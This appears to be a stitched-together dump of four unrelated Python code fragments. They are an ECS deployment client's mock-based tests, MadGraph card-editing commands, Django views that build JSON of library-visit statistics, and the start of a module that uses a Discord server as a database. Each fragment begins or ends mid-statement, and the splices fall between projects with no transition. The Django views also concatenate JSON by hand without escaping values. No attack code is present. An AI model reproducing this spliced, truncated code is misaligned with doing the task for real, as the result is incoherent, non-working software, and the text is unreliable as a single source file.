) -> TaskDefinition:
return cls._taskDefinitions[cls._currentTaskARN(cluster, service)]
@classmethod
def _currentContainerDefinition(
cls, cluster: str, service: str
) -> Mapping[str, Any]:
return cast(
Mapping[str, Any],
(
cls._currentTaskDefinition(cluster, service)[
"containerDefinitions"
][0]
),
)
@classmethod
def _currentImageName(cls, cluster: str, service: str) -> str:
return cast(
str, cls._currentContainerDefinition(cluster, service)["image"]
)
@classmethod
def _currentEnvironment(cls, cluster: str, service: str) -> TaskEnvironment:
return ECSServiceClient._environmentFromJSON(
cls._currentContainerDefinition(cluster, service)["environment"]
)
#
# Instance attributes
#
_awsService: str = attrib()
@_awsService.validator
def _validate_service(self, attribute: Attribute, value: Any) -> None:
assert value == "ecs"
def describe_task_definition(
self, taskDefinition: str
) -> Mapping[str, TaskDefinition]:
return {"taskDefinition": self._taskDefinitions[taskDefinition]}
def list_task_definitions(
self, familyPrefix: str
) -> Mapping[str, Sequence[str]]:
return {
"taskDefinitionArns": list(
t["taskDefinitionArn"]
for t in self._taskDefinitions.values()
if t["family"].startswith(familyPrefix)
)
}
def register_task_definition(
self, **taskDefinition: Any
) -> Mapping[str, TaskDefinition]:
# Come up with a new task ARN
maxVersion = 0
for arn in self._taskDefinitions:
version = int(arn.split(":")[-1])
if version > maxVersion:
maxVersion = version
arn = f"{self._defaultARNNamespace}:{maxVersion + 1}"
taskDefinition["taskDefinitionArn"] = arn
taskDefinition["revision"] = maxVersion + 1
taskDefinition["status"] = "ACTIVE"
taskDefinition["compatibilities"] = self._defaultCompatibilities
taskDefinition["requiresAttributes"] = self._defaultRequiresAttributes
self._taskDefinitions[arn] = taskDefinition
return {"taskDefinition": taskDefinition}
def describe_services(
self, cluster: str, services: Sequence[str]
) -> Mapping[str, Sequence[Mapping[str, str]]]:
return {
"services": [
{"taskDefinition": self._currentTaskARN(cluster, service)}
for service in services
if service in self._services[cluster]
],
}
def update_service(
self, cluster: str, service: str, taskDefinition: str
) -> None:
assert taskDefinition in self._taskDefinitions
self._setCurrentTaskARN(cluster, service, taskDefinition)
@contextmanager
def testingBoto3ECS() -> Iterator[None]:
MockBoto3ECSClient._addDefaultTaskDefinitions()
MockBoto3ECSClient._addDefaultServices()
boto3Client = ecs.boto3Client
ecs.boto3Client = MockBoto3ECSClient
try:
yield
finally:
ecs.boto3Client = boto3Client
MockBoto3ECSClient._clearServices()
MockBoto3ECSClient._clearTaskDefinitions()
class ECSServiceClientTests(TestCase):
"""
Tests for :class:`ECSServiceClient`
"""
def test_environmentAsJSON(self) -> None:
with testingBoto3ECS():
self.assertEqual(
ECSServiceClient._environmentAsJSON({"foo": "bar", "x": "1"}),
[{"name": "foo", "value": "bar"}, {"name": "x", "value": "1"}],
)
def test_environmentFromJSON(self) -> None:
with testingBoto3ECS():
self.assertEqual(
ECSServiceClient._environmentFromJSON(
[
{"name": "foo", "value": "bar"},
{"name": "x", "value": "1"},
]
),
{"foo": "bar", "x": "1"},
)
def test_aws(self) -> None:
"""
:meth:`ECSServiceClient._aws` property returns an AWS client.
"""
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
self.assertIsInstance(client._aws, MockBoto3ECSClient)
def test_currentTaskARN(self) -> None:
"""
:meth:`ECSServiceClient.currentTaskARN` returns the ARN of the current
task.
"""
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
arn = client.currentTaskARN()
self.assertEqual(
arn,
client._aws._currentTaskARN(client.cluster, client.service),
)
def test_currentTaskARN_noSuchService(self) -> None:
"""
:meth:`ECSServiceClient.currentTaskARN` raises
:exc:`NoSuchServiceError` when the service doesn't exist.
task.
"""
with testingBoto3ECS():
doesntExistService = "xyzzy"
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=doesntExistService,
)
e = self.assertRaises(NoSuchServiceError, client.currentTaskARN)
self.assertEqual(e.service, doesntExistService)
def test_currentTaskDefinition(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
taskDefinition = client.currentTaskDefinition()
self.assertIsInstance(taskDefinition, dict)
self.assertTrue(taskDefinition.get("family"))
self.assertTrue(taskDefinition.get("revision"))
self.assertTrue(taskDefinition.get("containerDefinitions"))
self.assertIn("FARGATE", taskDefinition.get("compatibilities", []))
def test_currentImageName(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
imageName = client.currentImageName()
self.assertEqual(
imageName,
client._aws._currentImageName(client.cluster, client.service),
)
@given(integers(min_value=2))
def test_updateTaskDefinition_updated(self, tag: int) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
repo, oldTag = client.currentImageName().split(":")
assume(int(oldTag) != tag)
newImageName = f"{repo}:{tag}"
newTaskDefinition = client.updateTaskDefinition(
imageName=newImageName
)
self.assertEqual(
client._taskImageName(newTaskDefinition), newImageName
)
def test_updateTaskDefinition_none(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
self.assertRaises(NoChangesError, client.updateTaskDefinition)
def test_updateTaskDefinition_same(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
self.assertRaises(
NoChangesError,
client.updateTaskDefinition,
imageName=client.currentImageName(),
)
@given(environment_updates(min_size=1))
def test_updateTaskDefinition_updateEnvironment(
self, newEnvironment: TaskEnvironment
) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
# TRAVIS environment variable makes Travis-CI things happen which
# we aren't testing for here.
assume("TRAVIS" not in newEnvironment)
newTaskDefinition = client.updateTaskDefinition(
environment=newEnvironment
)
updatedEnvironment = dict(
client._environmentFromJSON(
newTaskDefinition["containerDefinitions"][0]["environment"]
)
)
expectedEnvironment = dict(newEnvironment)
# TASK_UPDATED is inserted during updates.
self.assertIn("TASK_UPDATED", updatedEnvironment)
expectedEnvironment["TASK_UPDATED"] = updatedEnvironment[
"TASK_UPDATED"
]
self.assertEqual(updatedEnvironment, expectedEnvironment)
@given(
ascii_text(min_size=1), # project
repository_ids(), # repository
integers(), # buildNumber
ascii_text(min_size=1), # buildURL
commitIDs(), # commitID
ascii_text(min_size=1), # commitMessage
)
def test_updateTaskDefinition_ci(
self,
project: str,
repository: str,
buildNumber: int,
buildURL: str,
commitID: str,
commitMessage: str,
) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
# Patch the (local) system environment to emulate CI
ciEnvironment = {
"BUILD_NUMBER": str(buildNumber),
"BUILD_URL": buildURL,
"COMMIT_ID": "0" * 40,
"COMMIT_MESSAGE": commitMessage,
"PROJECT_NAME": project,
"REPOSITORY_ID": repository,
}
self.patch(ecs, "environ", ciEnvironment)
# Make an unrelated change to avoid NoChangesError
newTaskDefinition = client.updateTaskDefinition(
imageName=f"{client.currentImageName()}4027"
)
updatedEnvironment = dict(
client._environmentFromJSON(
newTaskDefinition["containerDefinitions"][0]["environment"]
)
)
expectedEnvironment = dict(
client._aws._currentEnvironment(client.cluster, client.service)
)
expectedEnvironment.update(
{(f"CI_{k}", v) for (k, v) in ciEnvironment.items()}
)
# TASK_UPDATED is inserted during | |
== '--clean':
ff = open(path,'w')
ff.write("# %s \n" % card)
ff.write("%s \n" % line.split(None,2)[2])
ff.close()
logger.info("writing the line in %s (empty file) the line: \"%s\"" %(card, line.split(None,2)[2] ),'$MG:BOLD')
elif args[1].startswith('--line_position=afterlast'):
#position in file determined by user
text = open(path).read()
split = text.split('\n')
if self.last_editline_pos > 0:
pos = self.last_editline_pos +1
newline = line.split(None,2)[2]
split.insert(pos, newline)
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(pos, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = pos
elif args[1].startswith('--line_position='):
#position in file determined by user
text = open(path).read()
split = text.split('\n')
pos = int(args[1].split('=',1)[1])
newline = line.split(None,2)[2]
split.insert(pos, newline)
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(pos, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = pos
elif args[1].startswith(('--after_line=banner','--after_line=\'banner\'','--after_line=\"banner\"')):
# write the line at the first not commented line
text = open(path).read()
split = text.split('\n')
for posline,l in enumerate(split):
if not l.startswith('#'):
break
split.insert(posline, line.split(None,2)[2])
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(posline, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = posline
elif args[1].startswith('--replace_line='):
# catch the line/regular expression and replace the associate line
# if no line match go to check if args[2] has other instruction starting with --
text = open(path).read()
split = text.split('\n')
search_pattern=r'''replace_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[14:-1]
for posline,l in enumerate(split):
if re.search(pattern, l):
break
else:
new_line = re.split(search_pattern,line)[-1].strip()
if new_line.startswith(('--before_line=','--after_line')):
return self.do_add('%s %s' % (args[0], new_line))
raise Exception('invalid regular expression: not found in file')
# found the line position "posline"
# need to check if the a fail savety is present
new_line = re.split(search_pattern,line)[-1].strip()
if new_line.startswith(('--before_line=','--after_line')):
search_pattern=r'''(?:before|after)_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
new_line = re.split(search_pattern,new_line)[-1]
# overwrite the previous line
old_line = split[posline]
split[posline] = new_line
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("Replacing the line \"%s\" [line %d of %s] by \"%s\"" %
(old_line, posline, card, new_line ),'$MG:BOLD')
self.last_editline_pos = posline
elif args[1].startswith('--comment_line='):
# catch the line/regular expression and replace the associate line
# if no line match go to check if args[2] has other instruction starting with --
text = open(path).read()
split = text.split('\n')
search_pattern=r'''comment_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[14:-1]
nb_mod = 0
for posline,l in enumerate(split):
if re.search(pattern, l):
split[posline] = '#%s' % l
nb_mod +=1
logger.info("Commenting line \"%s\" [line %d of %s]" %
(l, posline, card ),'$MG:BOLD')
# overwrite the previous line
if not nb_mod:
logger.warning('no line commented (no line matching)')
ff = open(path,'w')
ff.write('\n'.join(split))
self.last_editline_pos = posline
elif args[1].startswith('--before_line='):
# catch the line/regular expression and write before that line
text = open(path).read()
split = text.split('\n')
search_pattern=r'''before_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[13:-1]
for posline,l in enumerate(split):
if re.search(pattern, l):
break
else:
raise Exception('invalid regular expression: not found in file')
split.insert(posline, re.split(search_pattern,line)[-1])
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(posline, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = posline
elif args[1].startswith('--after_line='):
# catch the line/regular expression and write after that line
text = open(path).read()
split = text.split('\n')
search_pattern = r'''after_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[12:-1]
for posline,l in enumerate(split):
if re.search(pattern, l):
break
else:
posline=len(split)
split.insert(posline+1, re.split(search_pattern,line)[-1])
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(posline+1, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = posline+1
else:
ff = open(path,'a')
ff.write("%s \n" % line.split(None,1)[1])
ff.close()
logger.info("adding at the end of the file %s the line: \"%s\"" %(card, line.split(None,1)[1] ),'$MG:BOLD')
self.last_editline_pos = -1
self.reload_card(path)
do_edit = do_add
complete_edit = complete_add
def help_asperge(self):
"""Help associated to the asperge command"""
signal.alarm(0)
print('-- syntax: asperge [options]')
print(' Call ASperGe to diagonalize all mass matrices in the model.')
print(' This works only if the ASperGE module is part of the UFO model (a subdirectory).')
print(' If you specify some names after the command (i.e. asperge m1 m2) then ASperGe will only')
print(' diagonalize the associate mass matrices (here m1 and m2).')
def complete_asperge(self, text, line, begidx, endidx, formatting=True):
prev_timer = signal.alarm(0) # avoid timer if any
if prev_timer:
nb_back = len(line)
self.stdout.write('\b'*nb_back + '[timer stopped]\n')
self.stdout.write(line)
self.stdout.flush()
blockname = list(self.pname2block.keys())
# remove those that we know for sure are not mixing
wrong = ['decay', 'mass', 'sminput']
valid = [k for k in blockname if 'mix' in k]
potential = [k for k in blockname if k not in valid+wrong]
output = {'Mixing matrices': self.list_completion(text, valid, line),
'Other potential valid input': self.list_completion(text, potential, line)}
return self.deal_multiple_categories(output, formatting)
def do_asperge(self, line):
"""Running ASperGe"""
signal.alarm(0) # avoid timer if any
# ensure that the card is in sync
if 'param' in self.modified_card:
self.write_card('param')
self.modified_card.discard('param')
path = pjoin(self.me_dir,'bin','internal','ufomodel','ASperGE')
if not os.path.exists(path):
logger.error('ASperge has not been detected in the current model, therefore it will not be run.')
return
elif not os.path.exists(pjoin(path,'ASperGe')):
logger.info('ASperGe has been detected but is not compiled. Running the compilation now.')
try:
misc.compile(cwd=path,shell=True)
except MadGraph5Error as error:
logger.error('''ASperGe failed to compile. Note that gsl is needed
for this compilation to go trough. More information on how to install this package on
http://www.gnu.org/software/gsl/
Full compilation log is available at %s''' % pjoin(self.me_dir, 'ASperge_compilation.log'))
open(pjoin(self.me_dir, 'ASperge_compilation.log'),'w').write(str(error))
return
opts = line.split()
card = self.paths['param']
logger.info('running ASperGE')
returncode = misc.call([pjoin(path,'ASperGe'), card, '%s.new' % card] + opts)
if returncode:
logger.error('ASperGE fails with status %s' % returncode)
else:
logger.info('AsPerGe creates the file succesfully')
files.mv(card, '%s.beforeasperge' % card)
files.mv('%s.new' % card, card)
self.reload_card(card)
def copy_file(self, path, pathname=None):
"""detect the type of the file and overwritte the current file"""
if not pathname:
pathname = path
if path.endswith('.lhco'):
#logger.info('copy %s as Events/input.lhco' % (path))
#files.cp(path, pjoin(self.mother_interface.me_dir, 'Events', 'input.lhco' ))
self.do_set('mw_run inputfile %s' % os.path.relpath(path, self.mother_interface.me_dir))
return
elif path.endswith('.lhco.gz'):
#logger.info('copy %s as Events/input.lhco.gz' % (path))
#files.cp(path, pjoin(self.mother_interface.me_dir, 'Events', 'input.lhco.gz' ))
self.do_set('mw_run inputfile %s' % os.path.relpath(path, self.mother_interface.me_dir))
return
else:
card_name = self.detect_card_type(path)
if card_name == 'unknown':
logger.warning('Fail to determine the type of the file. Not copied')
if card_name != 'banner':
logger.info('copy %s as %s' % (pathname, card_name))
files.cp(path, self.paths[card_name.rsplit('_',1)[0]])
self.reload_card(self.paths[card_name.rsplit('_',1)[0]])
elif card_name == 'banner':
banner_mod.split_banner(path, self.mother_interface.me_dir, proc_card=False)
logger.info('Splitting the banner in it\'s component')
if not self.mode == 'auto':
self.mother_interface.keep_cards(self.cards)
for card_name in self.cards:
self.reload_card(pjoin(self.me_dir, 'Cards', card_name))
def detect_card_type(self, path):
"""detect card type"""
return CommonRunCmd.detect_card_type(path)
def open_file(self, answer):
"""open the file"""
try:
me_dir = self.mother_interface.me_dir
except:
me_dir = None
if answer.isdigit():
if answer == '9':
answer = 'plot'
else:
answer = self.cards[int(answer)-self.integer_bias]
if 'madweight' in answer:
answer = answer.replace('madweight', 'MadWeight')
elif 'MadLoopParams' in answer:
answer = self.paths['ML']
elif 'pythia8_card' in answer:
answer = self.paths['pythia8']
if os.path.exists(answer):
path = answer
else:
if not '.dat' in answer and not '.lhco' in answer:
if answer != 'trigger':
path = self.paths[answer]
else:
path = self.paths['delphes']
elif not '.lhco' in answer:
if '_' in answer:
path = self.paths['_'.join(answer.split('_')[:-1])]
else:
path = pjoin(me_dir, 'Cards', answer)
else:
path = pjoin(me_dir, self.mw_card['mw_run']['inputfile'])
if not os.path.exists(path):
logger.info('Path in MW_card not existing')
path = pjoin(me_dir, 'Events', answer)
#security
path = path.replace('_card_card','_card')
if answer in self.modified_card:
self.write_card(answer)
elif os.path.basename(answer.replace('_card.dat','')) in self.modified_card:
self.write_card(os.path.basename(answer.replace('_card.dat','')))
try:
self.mother_interface.exec_cmd('open %s' % path)
except InvalidCmd as error:
if str(error) != 'No default path for this file':
raise
if answer == 'transfer_card.dat':
logger.warning('You have to specify a transfer function first!')
elif answer == 'input.lhco':
path = pjoin(me_dir,'Events', 'input.lhco')
ff = open(path,'w')
ff.write('''No LHCO information imported at current time.
To import a lhco file: Close this file and type the path of your file.
You can also copy/paste, your event file here.''')
ff.close()
self.open_file(path)
else:
raise
self.reload_card(path)
def reload_card(self, path):
"""reload object to have it in sync"""
if path == self.paths['param']:
try:
self.param_card = param_card_mod.ParamCard(path)
except (param_card_mod.InvalidParamCard, ValueError) as e:
logger.error('Current param_card is not valid. We are going to use the default one.')
logger.error('problem detected: %s' % e)
logger.error('Please re-open the file and fix the problem.')
logger.warning('using the \'set\' command without opening the file will discard all your manual change')
elif path == self.paths['run']:
self.run_card = banner_mod.RunCard(path)
elif path == self.paths['shower']:
self.shower_card = shower_card_mod.ShowerCard(path)
elif path | |
% start_hour
jsonp += '"end_hour":"%s",' % end_hour
jsonp += '"dow":"%s",' % dow
jsonp += '"data":{"average":"%s"}' % average
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def averages(request, library, start, end, start_hour, end_hour, dow, filter_on):
dates = calculate_dates(start, end)
count = 0
totals = 0
classifications = get_classifications(filter_on)
jsonp = '{"data":{'
counts = []
for classification in classifications:
while (count <= dates['weeks']):
start_time = dates['start_date']+relativedelta(weeks=+count, hour=int(start_hour), weekday=int_day(int(dow)))
end_time = dates['start_date']+relativedelta(weeks=+count, hour=int(end_hour), weekday=int_day(int(dow)))
numbers = LibraryVisit.objects \
.values('visit_time') \
.annotate(total=Count('visit_time')) \
.filter(visit_time__range=[start_time, end_time])\
.filter(visit_time__week_day = dow) \
.filter(location = library) \
.filter(**{ filter_on: classification })
for number in numbers:
if number['visit_time'].hour != end_hour:
totals += number['total']
count += 1
average = totals / count
counts.append('"%s":{"label":"%s","value":%s}' % (slugify(classification), classification, average))
count = 0
totals = 0
jsonp += ', '.join(counts)
jsonp += '},'
jsonp += '"meta":{'
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"strt_hour":["%s"],' % start_hour
jsonp += '"end_hour":["%s"],' % end_hour
jsonp += '"dow":["%s"],' % alph_day(dow)
jsonp += '"queried_at":["%s"]' % datetime.now()
jsonp += '}}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def faculty_dprt_count(request, library, start, end):
'''
{
"data": {
"divs": {
"division-name-slug": {
"label": "Division Name",
"value": 10009,
"depts": {
"department-name-slug": {
"label": "Department Name",
"value": 9990
}
}
}
}
},
"meta":{
"start_date": "YYYY-MM-DD",
"end_date": "YYYY-MM-DD",
"library": "library name",
"title": "Faculty Department"
}
}
'''
def division_count(division, library, start, end):
count = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dvsn_n = division)
if count:
return count[0]['total']
else:
return 0
def department_count(department, library, start, end):
count = LibraryVisit.objects.values('dprt_n') \
.annotate(total=Count('dprt_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dprt_n = department)
if count:
return count[0]['total']
else:
return 0
faculty_divisions = get_classifications('dvsn_n')
jsonp = '{"data":{"divs":{'
jsonp += '"'
faculty_divisions_list = (sorted(faculty_divisions.reverse()[1:]))
for faculty_division in faculty_divisions_list:
visit_count = division_count(faculty_division, library, start, end)
departments = get_classifications(faculty_division)
departments_list = (sorted(departments.reverse()[1:]))
last_departments = departments.reverse()[:1]
jsonp += '%s": {' % slugify(faculty_division)
jsonp += '"label": "%s",' % faculty_division
jsonp += '"value": "%s",' % visit_count
jsonp += '"depts":{'
for department in departments_list:
department_visit_count = department_count(department, library, start, end)
jsonp += '"%s":{' % slugify(department)
jsonp += '"label": "%s",' % department
jsonp += '"value": "%s"' % department_visit_count
jsonp += '},'
for last_department in last_departments:
last_department_visit_count = department_count(last_department, library, start, end)
jsonp += '"%s":{' % slugify(last_department)
jsonp += '"label": "%s",' % last_department
jsonp += '"value": "%s"' % last_department_visit_count
jsonp += '}'
jsonp += '}'
jsonp += '},"'
last_faculty_divisions = faculty_divisions.reverse()[:1]
for last_faculty_division in last_faculty_divisions:
last_division_count = division_count(last_faculty_division, library, start, end)
last_departments = get_classifications(last_faculty_division)
last_departments_list = sorted(last_departments.reverse()[1:])
final_departments = last_departments.reverse()[:1]
jsonp += '%s":{' % slugify(last_faculty_division)
jsonp += '"label": "%s",' % last_faculty_division
jsonp += '"value": "%s",' % last_division_count
jsonp += '"depts":{'
for final_department in last_departments_list:
final_department_visit_count = department_count(final_department, library, start, end)
jsonp += '"%s": {' % slugify(final_department)
jsonp += '"label": "%s",' % final_department
jsonp += '"value": "%s"' % final_department_visit_count
jsonp += '},'
for last_final_department in final_departments:
last_final_department_visit_count = department_count(last_final_department, library, start, end)
jsonp += '"%s": {' % slugify(last_final_department)
jsonp += '"label": "%s",' % last_final_department
jsonp += '"value": "%s"' % last_final_department_visit_count
jsonp += '}'
jsonp += '}'
jsonp += '}}}'
jsonp += ',"meta":{'
jsonp += '"library":["%s"],' % library
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"title":["%s"]' % "Faculty Department"
jsonp += '}'
jsonp += ',"queried_at": "%s"' % datetime.now()
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def faculty_divs_dprt(request, library, start, end):
'''
{
"data": {
"divs": [
{
"label": "Division Name",
"value": 10009,
"depts": [
[
"label": "Department Name",
"value": 9990
]
]
}
]
},
"meta":{
"start_date": "YYYY-MM-DD",
"end_date": "YYYY-MM-DD",
"library": "library name",
"title": "Faculty Department"
}
}
'''
def division_totals(library, start, end):
count = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total')
if count:
return count
else:
return 0
def division_count(division, library, start, end):
count = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dvsn_n = division)
if count:
return count[0]['total']
else:
return 0
def department_totals(library, start, end):
count = LibraryVisit.objects.values('dprt_n') \
.annotate(total=Count('dprt_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total')
if count:
return count
else:
return 0
def department_count(department, library, start, end):
count = LibraryVisit.objects.values('dprt_n') \
.annotate(total=Count('dprt_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dprt_n = department)
if count:
return count[0]['total']
else:
return 0
jsonp = '{"data":{"divs":['
faculty_divisions_list = division_totals(library, start, end)
if (faculty_divisions_list):
for faculty_division in faculty_divisions_list:
faculty_division_name = faculty_division["dvsn_n"]
visit_count = faculty_division["total"]
departments_list = get_classifications(faculty_division_name)
print faculty_division_name
print departments_list
print '\n'
print '\n'
last_departments = departments_list.reverse()[:1]
jsonp += '{'
jsonp += '"label": "%s",' % faculty_division_name
jsonp += '"value": "%s",' % visit_count
jsonp += '"depts":['
for department in departments_list:
department_name = department
department_visit_count = department_count(department,library,start,end)
jsonp += '{'
jsonp += '"label": "%s",' % department_name
jsonp += '"value": "%s"' % department_visit_count
jsonp += '},'
if(jsonp[-1:] != '['):
jsonp = jsonp[:-1]
jsonp += ']},'
last_faculty_divisions = faculty_divisions_list.reverse()[:1]
for last_faculty_division in last_faculty_divisions:
#remove last comma
if(jsonp[-1:] != '['):
jsonp = jsonp[:-1]
jsonp += ']'
jsonp += '}'
else:
jsonp += ']'
jsonp += '}'
jsonp += ',"meta":{'
jsonp += '"library":["%s"],' % library
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"title":["%s"]' % "Faculty Department"
jsonp += '}'
jsonp += ',"queried_at": "%s"' % datetime.now()
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def academic_career_count(request, library, start, end):
'''
{
"data": [
{
"label": "School Name",
"value": 10009,
"data": [
[
epoch_timestamp,
value
]
]
}
],
"meta":{
"start_date": "YYYY-MM-DD",
"end_date": "YYYY-MM-DD",
"library": "library name",
"title": "Academic Career"
}
}
'''
def career_list(library, start, end):
record = LibraryVisit.objects \
.values('acca_i') \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(Q(prsn_c_type = 'B') | Q(prsn_c_type = 'S')) \
.annotate(total=Count('acca_i')) \
.order_by('-total')
return record
academic_careers = career_list(library, start, end)
jsonp = '{"data":['
academic_careers_list = academic_careers
for academic_career in academic_careers_list:
academic_career_name = academic_career["acca_i"]
visits =[]
visit_count = academic_career["total"]
numbers = LibraryVisit.objects.values('visit_time') \
.annotate(total=Count('visit_time')) \
.order_by('visit_time') \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(acca_i = academic_career_name)
for number in numbers:
if number.has_key('visit_time'):
dt = datetime.strptime(str(number['visit_time']), '%Y-%m-%d %H:%M:%S')
epoch = int(time.mktime(dt.timetuple()))
# We have to add the three zeros to work with HighCharts
visits.append('[%s000,%s]' % (epoch, number['total']))
visits = ', '.join(visits)
jsonp += '{'
jsonp += '"label": "%s",' % academic_career_name
jsonp += '"value": "%s",' % visit_count
jsonp += '"data": [%s]' % visits
jsonp += '},'
if(jsonp[-1:] != '['):
jsonp = jsonp[:-1]
jsonp += ']'
jsonp += ',"meta":{'
jsonp += '"library":["%s"],' % library
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"title":["%s"]' % "Academic Career"
jsonp += '}'
jsonp += ',"queried_at": "%s"' % datetime.now()
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def percent_date(whole, part, label):
return '[%s: %s]' % (label, (100 * float(part)/float(whole)))
def percentage(request, library, start, end, filter_on):
'''
get total based on filter then iterate
'''
def classifications(request):
student_classes = get_classifications('stdn_e_clas')
academic_plans = get_classifications('acpl_n')
departments = get_classifications('dprt_n')
academic_career = get_classifications('acca_i')
faculty_divisions = get_classifications('dvsn_n')
jsonp = '{'
jsonp += '"student_classes":["'
jsonp += '","'.join(student_classes)
jsonp += '"],'
jsonp += '"academic_plans":["'
jsonp += '","'.join(academic_plans)
jsonp += '"],'
jsonp += '"academic_career":["'
jsonp += '","'.join(academic_career)
jsonp += '"],'
jsonp += '"faculty_divisions":["'
jsonp += '","'.join(faculty_divisions)
jsonp += '"],'
jsonp += '"departments":["'
jsonp += '","'.join(departments)
jsonp += '"]'
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def student_classifications(request):
student_classes = LibraryVisit.objects.values_list('stdn_e_clas', flat=True).distinct().exclude(stdn_e_clas__isnull=True)
data = []
jsonp = []
jsonp = '{'
jsonp += '"student_classes":["'
jsonp += '","'.join(student_classes)
jsonp += '"]'
jsonp += '}'
return HttpResponse(jsonp, content_type='application/json')
def classification_totals(request, library, person_type, start, end):
'''
Calculates totals based on specific classifications.
'''
student_classes = LibraryVisit.objects.values_list('stdn_e_clas', flat=True).distinct().exclude(stdn_e_clas__isnull=True)
def class_totals(location, person_type, start, end):
numbers =0
if person_type == 'all':
numbers = LibraryVisit.objects.values('prsn_e_type') \
.annotate(total=Count('prsn_e_type')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total')
elif person_type == 'student':
numbers = LibraryVisit.objects.values('acca_i') \
.annotate(total=Count('acca_i')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total') \
.filter(Q(prsn_c_type = 'B') | Q(prsn_c_type = 'S'))
elif person_type == 'faculty':
numbers = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n')) | |
<gh_stars>1-10
import discord
import re
from enum import Enum
from datetime import datetime
# SDDB uses a Discord guild as a ghetto database and supports simple DB operations - create, select, update, delete.
# The │ character ASCII(0x2502) is used as a global delimiter, and is not allowed under any circumstances.
# A database is identified as a channel category in the Discord guild.
# - Databases can have multiple tables
# - Each Database has a master table that maps fields for each table in the database
# A table is identified as a text channel in the Discord guild.
# - Tables have columns as defined by it's record in the master table delimitated by the 0x2502 character.
# A row is identified as a text message in a text channel in the Discord guild.
# - Row columns are delimitated by the 0x2502 character.
# - Primary key is the message id.
# "from" is a Python keyword and cannot be used as a variable, "against" is used instead for SQL-like syntax.
class DBMS:
def __init__(self, discord_client, database_guild):
if not isinstance(discord_client, discord.Client):
raise TypeError("discord_client must be a discord.Client")
self.d = discord_client
self.db = None
self.ad = None # Active database pointer
if isinstance(database_guild, discord.Guild):
self.db = database_guild
elif isinstance(database_guild, int):
self.db = self.d.get_guild(database_guild)
if self.db is None:
